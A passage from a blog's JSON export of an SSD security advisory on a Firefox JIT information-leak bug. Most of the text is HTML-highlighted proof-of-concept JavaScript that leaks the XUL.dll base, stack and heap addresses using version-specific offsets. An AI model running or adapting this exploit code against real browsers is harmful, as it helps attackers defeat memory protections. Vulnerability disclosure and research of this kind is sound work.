class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">expr<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-40\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-41\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">eval<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">code<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-42\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-43\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-44\"><span class=\"crayon-e\">VERSION<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;62.0&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-45\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-46\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">exploit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-47\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xul<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-48\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">stack<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-49\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">heap<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-50\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-51\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">leak<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-52\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">gen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-54\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">j<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">j<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10000<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">j<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-55\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">f<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-56\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-57\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">f<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">100<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-58\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-59\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">f2i<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">test<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-60\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-61\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">leak<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">push<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-62\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-63\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">xulbase<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-65\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">VERSION<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;62.0&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-66\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">offsets<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-67\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0x92fe34<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-68\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0x3bd4108<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-69\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-70\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-71\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;Unknown version: &#8216;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">VERSION<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-72\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">throw<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-73\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-74\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-75\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">offsets<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">forEach<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">offset<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-76\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">offset<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-77\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">offset<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-78\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-79\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-80\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-81\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-82\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-83\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">xul<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">xulbase<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">leak<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-84\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">stack<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">leak<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-85\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">heap<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">leak<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-86\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-87\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">el<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">createElement<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;pre&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-88\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">el<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">innerText<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-89\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;XUL.dll base: &#8220;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">hex<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">xul<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;n&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-90\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;Stack: &#8220;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">hex<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">stack<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;n&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-91\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;Heap: &#8220;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">hex<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">heap<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;n&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-92\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;nFull leak:n&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">leak<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">map<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">hex<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">join<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;n&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-93\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">appendChild<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">el<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-94\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-95\"><span class=\"crayon-ta\">&lt;\/script&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-96\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-97\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">button <\/span><span class=\"crayon-e\">onclick<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;exploit()&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">Go<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">button<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0201 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3766\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/just-in-time-inermediate-representation-infloleak-182x300.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Tue, 09 Oct 2018 08:55:15 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary A vulnerability where the JavaScript JIT compiler inlines Array.prototype.push with multiple arguments that results in the stack pointer being off by 8 bytes after a bailout. This leaks a memory address to the calling function which can be used as part of an exploit inside the sandboxed content process. Vendor Response &#8220;Security vulnerabilities &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3766\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Firefox Information Leak<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[19715,10757],"class_list":["post-13544","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-information-leak","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13544","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=13544"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13544\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=13544"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=13544"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=13544"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}